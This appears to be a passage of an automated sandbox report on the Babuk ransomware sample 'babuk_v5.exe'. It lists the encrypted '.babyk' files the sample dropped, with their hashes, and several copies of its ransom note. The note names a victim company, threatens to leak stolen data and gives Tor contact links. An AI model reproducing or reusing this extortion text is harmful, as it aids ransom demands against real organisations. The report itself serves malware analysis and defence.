                                                                            SSDEEP:24:fE1FEmqtmnapptNBH2J/kCkD9lc+oAQkYXp8KdWkqef2D:fEU7mniPLW/kl7c+TQnCcWpek
                                                                            MD5:390F523B40011382770374A5B62EF74A
                                                                            SHA1:E249D8AAA982326EC4848351B1FEE7251C4E9CCA
                                                                            SHA-256:B26642978B65AE3315C57E8D627D5053B254A7EC006A151905D4416D41F892A2
                                                                            SHA-512:5447420B7F857034EBEEF53FDF935A9A57B7AACD20C0C73E544E427B1D4E10CF28D4C196DF83D3F676E8B69C1FD245D63D24CA56F1F5B4245759B6E10534568B
                                                                            Malicious:false
                                                                            Preview: ..2 ..V..".[b.+N...".E..Z......c?.)..]L._....=.0..>....?.W)..IXr.1.6>e.A.dg}.k...X.b..........VK..&4).N.p...wxR....".hY..r~.......5.........=$....?E.c...4.6>.V>.....E.]Yk....Xb.:...3.....\...yh..V..9...=.#x.GA..,R(....i.~vT...8|O&........q..&[b7g..4/..|..pi..i../..3.G..]..#.....G...}.Q+JI....m.b$a;g..y....F.'.S*L........)...{.......%L04r.......#m.....k;.....$.u.I..l..bC>..V...,..+/.w..L.....v.a)....q..e.G.i....}...&..O..q[:...f.7*.......tJ.......W.V.e...q.8... ...y..Q.t..L....J.)G.sf....~8...&../j.s.m..r..1.r...!O.\v.y..D.."..j.b....1..O.`...B...R$.C:...D.2.`..j....;.8.!wy...d..J...D.S.......y..j..0....HL...NX..?z..;=Q.....:f......7..]U.h.....G...CA"...yy.tE5..A..*x.[...{K .d...F<.....:.....];~8..!...Z...hYWmf.Y......6b.P$..f@..o..&...Kr.V...|.,U.[...~f.4.*.6t+..mm...1.....f......+..#.........=Hi1..@...*Ub..)&..W...V..l..e.6...6..ot3.....,<.j..(...au.D.C........1#..V.H."..j..xr(2{i.I.........w.T':X.$<...`gG....f)...G.....?.9F.S..._.b...f.
                                                                            C:\Users\user\Desktop\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.828479071010184
                                                                            Encrypted:false
                                                                            SSDEEP:24:oeQZAGCsaNPb0Jcl0RXwL5jilGiH0JqKS7XOaEHfat3FRy/QrxdwhpZd5:onNCsa1b0JcaRS5W4iH0JxGXOr/a9FRS
                                                                            MD5:FEA4FA9896AFF341566796F6D186DCC2
                                                                            SHA1:347323C035B17CCD7262FCF4C9934A156CB3D39B
                                                                            SHA-256:718E1BDF908672AA4CE93ED77E509D9AC416C5D26505E9D186BCC9C0352DEE70
                                                                            SHA-512:2EB04F8BE7B5C81C6CD3AFDBDDD5BEE1D71D603297EF89E82C772B4DC5FC00E0F84BAC2A13109CE03FC6457BF8745BF020B561B78CD55DC5569DF3120539BA09
                                                                            Malicious:false
                                                                            Preview: vmN..EP...0..yx.6.S.''..Kg...2@r...0D..?C\.$g.Q|G..6F.....H ..|u..w... )....i...S..]..Ib..Z.m.s....d.=......x....Q.../p...."..?a.....4?.]..W...H.7$...f.j..e....2.....&%.........B.bH.A...bkk^'..\..F..W*....'......@<AW=..~.sa.....~H...B_s.I6.Y...kJk.....01..2.@..6yWMD.I>o.%...L.B..j.v..W.M..^........!....:<CO...._..b.;&.1...8e....5....Tm.+...........~k$##R..W.P.....N^.......2...p,.$j'?.i]..]B=...Dlc...1....[V.-...$....@.c6....E.........c4.-7|.....L.^..,.6.z.R...h.(....O..T.w...]Z.\Ph+.hY.%..2.N.#.P..G*.[.D..q.A}..!..{.....]CC).%..b.o.se..n..:..e...o..@.g6(zJ...e^.@.....7..;..6B..RL.;..\]lK.!./......'...Y..1LM.D......k..w..~nLp..Yy.N......q!%...z[.g..@..S.b.U..Z.......^...bPs\..AJ.C-.._/.J._...:#...P....(/I.E.a.:M..|z.[TiU...........E.!.nJ.P.5i.....j...W.).....=.=hY....V ...<.;J..!.'I/.*....w.|.C.......`.^..t$.-5..P.q.n]n.....I....b.... zY.hq.......V..yD..7..}.}.]...g=5K.7..Icy....UW..4..1..N...<HA....2!..d=...).#(..x.\....~...;..1...q2.....Y...
                                                                            C:\Users\user\Desktop\NIKHQAIQAU.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.826717723102005
                                                                            Encrypted:false
                                                                            SSDEEP:24:thWi0jLGKi3F5EtQ86IpX6iuX9jMTqsjK1GMZzjhWRqFUzr42HmbJo04DQanTQtP:tnULGKeFqO8pKiuNt1VMp5Hmr4DLnkzJ
                                                                            MD5:622F19758CDBBF0434F2B277A86B691A
                                                                            SHA1:D0E91227CE0885FF88C582ABDBA05BC6DB88B0BF
                                                                            SHA-256:8AEA1F08B9FCF00CEC329677EA9A55B22BC43A8046F30F4E7DB6D80EE206ABBC
                                                                            SHA-512:CE7FFF4390C5A30111D16A078F88A69B7F286244438A4D6C024266DF9D4CB2E450D6FB45ADA02F5E2A27CCDAE8922F6D63DFA1FBBF5264CBE8C44E4214690961
                                                                            Malicious:false
                                                                            Preview: ...B.d.....A.L.N...N.,...5.=...eH..c.....ymu......e..j..t........LD.......Z1X.:.xQs.W......./..r.v.p.7.2...s..0.P....zz1.j8...}G7.._[.Q...*.L.^./.....I.#b.j\h.H....|.|.h.......9Eh.o..l.....*g#,K..b....,...R......82-.$..8.M..t..mC.K4-dL.."L.^^.f...#.q./.N,V.Aw.1......k.(.X..4g..p'mQ..I.....}S.i.]..S.S..xf.q....#C.H.....D....N.u...^s.IE....)<..f..=).-.'&X..CfS..C..wm..X......#'...q.P......Q.....6.e.Q*.......{a'...g.0.z(..J...7X...J.o...%......f}*6+..pA......c.....q..b.c...-......R..".:.N......8.&8.....z...o@......G..Z......[Y..ZP..[]+.h&.s...[s............Ht...X...`MY.....D.....{..d}.N.#..B.].9.{.>.y.....4..Kg}Z..`...g&B.I.h<.Mi.l%*...q.Z.:L....9.r5.Bgq2..A..66...9.8.+.<".es..[jA+..mu$.6[z|.m..WTT..1.t2...6xP.s.@Z...Q..../.G..^.O.;M...R..~e. ...........L..I.d...C..xi$...._..}"f[......h.f.o.....i..T<...{...wi<V.....I......<.....*.{.:....e.....bM2.#X.....Fv~..D..#..t.F..5s..e..k.......V.3.D.9.tc.S{.m...IF...].^8.4..a...).\b.a...#.p..
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\FENIVHOIKN.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.838022289176802
                                                                            Encrypted:false
                                                                            SSDEEP:24:1tkYXe1CpFL5qe8caIehF9NAghmZ1BJM0LU0vcsdY:1WskCpvqewhFzp4v/M84
                                                                            MD5:7FD96B3F3596DA519D214B3C8ACCF10E
                                                                            SHA1:E673FFD802DF2FCAECB5272A15236471A0F1CA3B
                                                                            SHA-256:22CDBF78204A69E956F83E2638A9F5A64B5D0F451A418C781165A3B9198FBF36
                                                                            SHA-512:E5B3A53EF6BCCE7FA2DE62D64995A259096D7BA3C6509B59EAD12A97FF1DA726BF4C16A334AF835FC441FECF91D66345BC2582B200955BA658E77760FE4FF62D
                                                                            Malicious:false
                                                                            Preview: z.....t..O.Z....X...0_.q.2..^b{..VPm....C[p}..f.b......UAo^.n<..|.58.H.D.U....%W... P.....jX.G+e(E..exa..Y...?H9.F..UX}M..?..>@.-.Rz*ZR.S..........f...=k2%B.kt_..)......].....x.'!.Ri..E.:.p..7......A..*&..U...'.D3G......dwSr)..."....c...F....u"....w..mz-l......mFj.........P.=...4..Iu..d.P...a....,a.R.`...0~... .S.[.D...........&A.uE.....wA#6y8..--GTV,.E....F?n.h.....(......Pi<...$.C.DU.#...tf....<R_B..-.\...R.P~.<z/....3.....T....t....h.D."~$G..u...........n....3....E...1.1Zg0g|.P^.J...B.X.1..5"...=..../.N.m...YN.N..u-p......p....oI..J.1.x3hh.l....%........N8..R....2..I..=*..M..=..P'<...PdW.R.B......(S.n...J.Km..g[<..h}..n.y.e%.*r.L....r..i.O...c....v.+.Q..8g|o.S.&....6.r..)jO<F.(Ykr...b... DE.V....j.g./[m-I.,5}X..........O.J.t.........$.....d...V...{i......2.M......}.LR..... ......6..%..N.....>[.ZOT.&....PQ!..(.;.I.w..T."..&.+j.i......U....j..;..,o.K.0J!..;.x......_l..N.Z.z...m...a....E4..uQ..%?..Xk.....#V1...z...C.L.@M..0`$g...Wa.w......d..
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\IPKGELNTQY.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8390162441802245
                                                                            Encrypted:false
                                                                            SSDEEP:24:LLSXb83bTpjhXDFf3Bljo1BOVEEP7DPRseLgrRENNT1Hl9rG7:SAbdFzFvB/EEP/nENwX9rG7
                                                                            MD5:0C84598E7C22F4961DB002E7309EECF7
                                                                            SHA1:A301EB7C1A5A40F98A3AA9CA977E772C4BA54725
                                                                            SHA-256:BA704571B1D99DFD8E7E3225BB78DBE0B7B49CA4FC7543D9C3335E8C2A71ACAB
                                                                            SHA-512:D95A4AFF3B99220F1CB89EB48A7A315302E87586E8C9D170BFDFF79488BA98170CE7AF8F9B017998E834A1F27901026DB0D87992C859F3846BC73AE92C771226
                                                                            Malicious:false
                                                                            Preview: .!...7b....a...&:.....o.H...Oa.Df'.2.@)..o.....+]S......^.b...o....mnjZ.3.'5.z..:.....n.Ni5#mB....n..."d>7Oz.}..TQ....~.a...x. 5t.{..)Hq.U.n...&~;....... ?.......z.1L.|x.[..!r..R.....Q.].<%..%alZ....jdUK. p.TT..%L.......6+.o.M...S.F."...b.....n..Z..P(...P(...HZ.\....+'..o}.Q..,..?d..+.%.OWm...J.....7.....S...2.~...^s.."...=R.E.....a.......b...l.K.....M<..0/........k".. Z..b?.Ln......`....s..q.......^F.e.U<.n..a...V.......d.O..`..b...y)......lH\.....'.r..\....~`...}".....8D...=..>...b/.[.._D.y.p.......P...s.N...?.v.N...._........2t.Qko.c....q......{....U...._..s.....]..?....U:.....Z..|<...&Mib4..E#{.....{u5...a6.............a...;.y.D..{.7......Y.'.?d?....gs{.../.$..z...x$..YN......5.Q......*.*..&.[....m.U...P#..^DHH"v.C...^...b.h..Q'i.c`.....d.Y....K..Gi9.(e..M.7...%{..2Z q#C..}0..3.Q....:.m.;^......H.....x......f@..o9...aX.z.sD$-.0.*.v....0.....yK...j....R...+j.m..U......#u.E.m........)....X.Y....*.Xg..In..h.l...f....u.LK.....00.
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.817049618198603
                                                                            Encrypted:false
                                                                            SSDEEP:24:bl5NDuRjYpnASwQgZHrCpm3tboBCVyL6yU2VPVaGq8YZQyMt9wxhFd:x5NDwvdZH2pm3SB1L6d2vaGqH6Z8xhz
                                                                            MD5:AD53B52996C9A37FF059C42A3A5E88DC
                                                                            SHA1:5228078B63E3687E31858A00AEAB33C1891118C6
                                                                            SHA-256:F4718AD2ABCB6D84E98250DAD4B1B55E2A8DCA300637DE13E6EA1C94E85B7DE3
                                                                            SHA-512:75355B07870FE977EA7B5C1647172EC045112852A455D2F983BE62D443D5A58B61BC355640D2F2140D08ECB0CB998E3BDF917B40906BC6C6C785E599945D5596
                                                                            Malicious:false
                                                                            Preview: N\.D..\C..L....>.3..N..B..b..l...x.....t.\..j..VE..Oh6#|.Q&mP..@..1f.&..\.hBW.cf..iq#...I...U.+..8..l...\...d.../R."B..9Y)..&qTp...5..#.... .7........_4c.?.#.w.*.......v...u..fn...\..G....^8...g..FM.jY...QtV..SN..~;...g.r...[.F:(...:.[^.U.6..2..J..F.%.z.V...C.....0...hcS.~$.C(`G.$...5I..Ri..`..l..."s...c..\.MG..4...B7d7wg.u..\.M.cw+y.z...8x..m.."..{vn)Vq....a~.O...6}8jn..."y.04._.w....U.H.V...O....i.W.... ...........n.."..49........`.....U..##.8D.a5...J..E....-...{...$.;h.S.%......Rk.......}..?HV;.B.D4.[9..~.mU%..H]a;$.\...^...;Yze......@..o~........U.....a.+.%..c5....k.u+JA\U.....$K..N.g1.........&U4I.....Q..t.vZ;K.....@.yD..6B^q..bE....#...Vz..[uY.[......]S._.6..o...@[HZ..IM........@..1.^........}[...~:...#.Yh.g.....R.z...is..jvS......N.K.........XYR.!v..s.h.)..9~ ...3..&..y..O...Rp.Q....GP.....X`.. ...k...........h~N...._Z...Qr.....%.D.t..ru..s..XHNlr}.-U)x.O.g.2.$.F..K..>..3...4d.X.&?.y...I........T.P.`...X`.F......../
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\UOOJJOZIRH.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.805722642116579
                                                                            Encrypted:false
                                                                            SSDEEP:12:S/jDahhc/EAUL+W77HrYmWkFKcSHPkLEeFAzWXy93Wpok5m++ltBBzuMiIHAev6a:6uhhyjEUcw/VzHAlmEIImhgIPIWJtKO
                                                                            MD5:FF20ED8E204B25D53FF57E0207E4BA76
                                                                            SHA1:72B0C013BD0CD4E1BE5BAA3E160DBF5E0FD3A542
                                                                            SHA-256:0B26003A7923801C2DFC34B6E428C89AB72999A36B9BE769D11D19E5462CA6C2
                                                                            SHA-512:FF902D0649DEB8451E50727907CE982FDCA5F72215E5C114153B5F93C0FEA4D83D038872FB73E12DF042636EA9BA04458E5D81BDAB85DBFF8045259629E50BFD
                                                                            Malicious:false
                                                                            Preview: }.lF&C.N...!@ x. ;p..+.R..!.xN?.<....[A.5._) ....|G.a.Mt.......=n.<4..q..\_G.m.2r}../.%....3........W........S&..s.N ...+...Y.*........b..).:...+.....>..A..n..\.w.=.>......Qt.9....pM..B...5q..'..b.....D....JU=..(ZGu..c.........*.Ax...U...3U......z9.Q......a....C5.}.. .e.s-@.k..8\q..h:.&.(.......V*.2.7bo....H.8.C.r.R7.N........;...Hg....~.O.. ../..;..@rm.U.p..u..TL.;..B...'l\..o..c#..~'...K9..q.xp]..7t.-.N.*p}...S...Y.....Tvd..Z..7........O.w:.D.Z...I#.pJ..%.....4.K2...T.?u w....z...T..|=........MO.."Z*D..g#~m.Y..}.&r..@v..jZl<..7.]N6.7T...t..Y;.g.2...w.FAT ..b...I.g..c..._.X..>2L_. z....z.....X.T"F.....)..~.S...#.H....a...K.2..,p7.2...z.........4.U;.N..?...........D.....h"..4....1z.J..r....6o:.w5...b.tCa. .rW.@S,.yC.......gqsG..bpX.+....k.F.I.(..U..ssd..*X5...l...D.[....J...<z..J:5...I..Q.<:D~.a%.....An...^....,.e.M.#.8.6..Y{.|m.h1..mLzs.'..K...y..+..j14J..(w.6..+.f.Xsx~.p..%c!ZC.).B.ADrn......e../.........M......X~(W.l.....M.
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\ZQIXMVQGAH.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.831972269902191
                                                                            Encrypted:false
                                                                            SSDEEP:24:OUJwdSr6yp/dcE1eS5oTKc6tURjv4iN33piZa3zsdLh8tpWhmb77r7cVo:cdSr6Ud119mefUtFp5zW8WhS77r7cVo
                                                                            MD5:EE2B09AA3B7FED3DFA8D9D9656170BD6
                                                                            SHA1:C21D77782F591ABF08825EA10FAD0FD3E9D1A221
                                                                            SHA-256:28C7C22C0DA38FAC12C9A273C11EF85E16221993BA57949E1DB4763F3D4D6D38
                                                                            SHA-512:37AB89F808CF48F4DA422F5B012BE6CDF27D9BE724BB47AF4A2A6B33B9B41B5784EB655D76DCC4FA56C9DA0F2747FA80AD8C0D31B698C59DA5758076E7310139
                                                                            Malicious:false
                                                                            Preview: .{k<.@...#>..P...M....}<.BB..1.8......Q..epU.g?..H..9..#\D...~S#........h'..]wC..h.#7.D..D.>..1..cV...UU ..b..Nh+.J:..`.|8n^2.a!i.| ....2...Srq.Q^...\.I...6.!}...z..w...K.h{?.8.r..Kw..F.!..#...|.{..@......PB2....fA.8.$GF..GA.i......._.>k.p...2..%>M.w.B..x..........&...H.v.gv..v..&.H...5.xy...9.N....$_.T..a.XS.:..S...,...lWp...`n3...F..x.M..*XrQ.7.S..[..&......$x?.F.S@....Te.7....d ......VT.e..}....\ ....+......y.....l_..5.......Z*_lU...g....Q.....b...\G.#te.....VB..d./...Hu....]\.C^QV..&..8...EUZ.m.wk.`...Y.[.(.....d.7S....!`....8.....~GmK...2.B..g......2.T......k...p...8.YWn-.:.Q...T1,...9.o.!...~.SI._.A.......a.m.6!U.....U....jH..R............x.@........7........z.;G.L..<.+9.LA.nt..s0..NJ+K..<...t...K.....2.l.i...i`rb...a..............P...+.........B..Ca.S.....*.9.>Z.d....#.n`...1:..'....C......e.~..a......0......4W....w..&a.{Q....P.. .A8.1\.....a.......q.k......bG....tG.P~.Q.....3..$......%...*.s...n..v.......&....H.9.rM@...>
                                                                            C:\Users\user\Desktop\NIKHQAIQAU\ZTGJILHXQB.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.806836951337706
                                                                            Encrypted:false
                                                                            SSDEEP:24:t4WeM7B8vBOKIslNoMBIz2m00Ug6bG5sdUFTyhu/7737nLQMn3nRrENvkFGk3bMK:txeZJzKzP0w6bGfEQzHD3Rr2A+Dq
                                                                            MD5:7B53F87AEFABD5944F56725B1C4EA239
                                                                            SHA1:BA81BDC4B0B3622E81F5E70DBAC743564BB233B7
                                                                            SHA-256:466502A9DA0D44FA39F35243C7AFEC74E869C741931A121CADDCA9A392398F1E
                                                                            SHA-512:CF43C3EBC1633C7712E6FE43F514A0FCD35FAEFACC9447CE4435D73FAB39631D433BA0FA979A8AB747D727CE22D9561283C0A4705BEF2D0A1E7D4C538E5EEDBF
                                                                            Malicious:false
                                                                            Preview: .~A^Z4[..2..\.o..SkF..X....V=n@.-...?.w.$!h..*....Zi>.t]..D?.|. v..{......F/mNF...~B..}.%".C..7..r.a.8.s7.d......p.#..q"...........3.`f...u......x.K..z....Iu.E&.._...e...H....KE3$..>._....T.....!....a...[IPn.2K.8...K..v.Ml2..I1..2..1.6.X;.....f.%[8"......L.fCXx-.a8...[......A..P...8.J..l..tNa..p...:=....T..A.,s"..4.0|3F6....MC?.....D/.S1c>l;q{.z...'z..Gd...}....o...%.n".?w...>.x.o..7_b`....{4..Mw%..v.....9......$&[.......O.o...V.~.7[.6}AwQpb......D..3..f......... .4:/....%~5..b..z...."..7o.L......:d[.R$q.....tDs..yj~....n..]..u..^<N%....e.zPrs.]s...f.....[.;r.~..._].n.x.9y|N..N.....).$..jR.G4.....t....\..QD.C7...>1.O..7d..^y.[$....K..J................).!\<.1..!..)J....GH..V.b.p.o<"..(....;.k:.'v6...s(.,.....\.<.Yk].3...d.y..$.....s.'..5^.I$.....\...Ld..KY.J..WB...L.x`n;...F'y.Pcm.@.]...N..Ljd...X..m`...'...7.G...........E........Xb........at..........t.Te?.\..h.;.xm......vw....>.\..3..~..R9H.UXr..p...mf..).`..2.....{.6..%...q;..
                                                                            C:\Users\user\Desktop\PIVFAGEAAV\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\QCFWYSKMHA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.807661539777658
                                                                            Encrypted:false
                                                                            SSDEEP:24:Fsuk52f8AoJ5JHqpSHJYg+sSPNbqISFg7cnoIy8rrB/D74/6jkG9:elEkpBnOPNbq2cnS014s
                                                                            MD5:134474BC5030A5B383F19C42C8016AB2
                                                                            SHA1:FDF47983E0FFB94CCBEC1734B9093F5610D3D038
                                                                            SHA-256:78F1E4F6220BC5C602D766341D5BD882507134CB3F749E36F3BAED2CB480B943
                                                                            SHA-512:C8C3E3D0663182B44FFD0A79576E530BC90E197FEE420E7FD0880FB4A36A863EFC79D10FBE29A71FC68AD20D9394B6B9213EB1543AB18A3E3A63104FF9989B7A
                                                                            Malicious:false
                                                                            Preview: ._...-|.=...n.`[PC.||.S.c/...c....-.5.m...<....B.......K[...]k.\.....1.M......kL4...1|.m....t..;V.x?z...#T..&\.:......5.D....C9...k..[...?:.N...fH.,'5V..<..o....\.*..LpU$ZI.+r...s...Y.UKR.9.P..S.S`.yZ.*P..[...^a:...i.M...G.vCE>.s.:Qv...O.Jp4..M....U.o..).h..[.0.....g..g.l.@..`.{.7.:9|w....o.....Y....n.t.s...*..Q{.....r`*.H.lO.....J%...4mT...t.$...}S.&.V.)w3.. ._..m.+..f....L..(...\Eu......$....c.G*...*#..O0.....5K...../......t.....KbP...r.u.uX..F...*..%.M...xL.X.5i.Oc...c|a.*...s..1..LPX.,..(pM..>C..,5.p...?...e.....DC.F..v..k.^G..2$.8.W:.9.......&........C.v{.y.QK...p.U.WvE........1...}...q{4C.."s...;Spz...9?........K.Q...%...b.H.,H.teG"aW.m..hIX......j2......V..%U_...o.0{.4) Yx..}4...4[p..{}!.....?...0V..Q.#."X\..NK..g....,.F..2 Q.*.ek...-@.l,0..Q.D..c..U..../. .....1BRkX...QR&Q'l}RJ.w....).4?....m;......:.xo}.K.k..X...i=.8..)......'......j.%...MB.].'{..F.N........2.H....%.....O.p<..GQ.j.....7.\..+.......h....->A.Uy.6F._.K^..Y....^q.*.G.."..
                                                                            C:\Users\user\Desktop\RAYHIWGKDI.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.823360246163598
                                                                            Encrypted:false
                                                                            SSDEEP:24:g6ig95Q5A1A3YgNuPgkMj5bCItanINiwvsgelGs1TE7deZpjs:gXbIAoAvbN5kINLvpelt1edeE
                                                                            MD5:D48CDFB2FC6B8CB07B5302F68D415314
                                                                            SHA1:252D651EA2662406C9F8E758A2EA5E1FE8F1B1B9
                                                                            SHA-256:51F07622087899241A29FE0A13C3E2C2C991D88DBCBBAF52492421717EC5D76A
                                                                            SHA-512:AE8EE2BD137261D589C38397DBDD9EF0E9B81075342BA5AC7F64AD6DC398CFF048D0E9B90235B3AD01921953C561C318E497E4DBD7C2786EB0F942016A387DFE
                                                                            Malicious:false
                                                                            Preview: JJu..5<........E.3......}.H........v..#.4..e........}.......)L.|.......>....i...c....vK../...2=..m.,L.d...tg.....A...9......{$.X\.e.......|...l...-+....he%..D.."/.9........F.$.;V.%R...`.;./.f....J.nj...e.......\...T|d.7zCB.]9...&.....<..}Q.&....0....Q`....W04.[.hZ..x.T.B..v...HD...b..../!Y4.....4..#.$.K..o.<....T$..F...q.RX.....5....?....U.y...A]....I. F.A...o...$V..VP..3......"9C..&.@\!5.}fs<....k.0..^{....f%.UmpO..u.1....#..'...#...Ov1....4.....<.?.p..~/....-,..d..4Qi..#...c5.;...x...J`.:..cIM.....eJLT...,GY.....w........yk,..V..jA..g.gD,...g@'.nJ^.... iILW..p.c..Q..?..<&P..GMkZ...0;..:.... .;...*..;q|.e...<-.p)...$`T....'.....l33.0.....a..F.z.,.~.y.yKBT..S4RO.d......mq<...w..?er...9.=R.-`.....|.y&..R.Y..`.:6....c.;.]:#.c0 .6"....c.5.q.0..qKn....".B...r..O.j.S!E8.g.+J~.mC..U...OE.!......d.........&.=......O&...7.w.S...'?m.I...2/.I.F....'..J....|.X\..}6....A2mCE...ka2..=|...d...6...XK&.....b.x..."F.....e...u<}.6..k.ml.....
                                                                            C:\Users\user\Desktop\SQRKHNBNYN.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.782193700135727
                                                                            Encrypted:false
                                                                            SSDEEP:24:gPx6PlK9gKqNzkpnYGc14t4pOEigIhCKuwAwYvmn0XIw0x6ZTgf:gGMg/Nzkfc14r5fiwAwYvmn0IVzf
                                                                            MD5:71A85286AE50488F587667B5336E4708
                                                                            SHA1:387BE4BEB1A1777E1255F1EB378FDE90D0950C55
